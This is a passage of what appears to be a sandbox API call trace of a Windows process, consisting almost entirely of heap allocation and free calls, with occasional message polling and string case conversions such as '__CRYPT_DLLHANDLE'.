[0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0215.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0215.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0215.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0215.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0215.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0215.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0215.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0215.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0215.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0215.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0215.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0215.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0215.754] CharLowerBuffW (in: lpsz="byte[8616]", cchLength=0xa | out: lpsz="byte[8616]") returned 0xa [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0215.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0215.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0215.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0215.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x21a8) returned 0x2f2a528 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0215.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0215.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0215.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0215.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x21a2) returned 0x2f2c6d8 [0215.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0215.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x21a2) returned 0x2f2e888 [0215.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0215.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0215.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0215.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2c6d8 | out: hHeap=0x970000) returned 1 [0215.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2e888 | out: hHeap=0x970000) returned 1 [0215.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0215.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0215.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0215.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0215.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0215.758] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0215.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0215.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0215.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0215.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0215.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0215.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0215.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0215.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0215.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0215.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0215.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0215.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0215.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0215.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0215.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x21a2) returned 0x2f2c6d8 [0215.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2c6d8 | out: hHeap=0x970000) returned 1 [0215.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0215.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0215.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0215.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0215.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0215.763] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0215.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0215.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0215.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 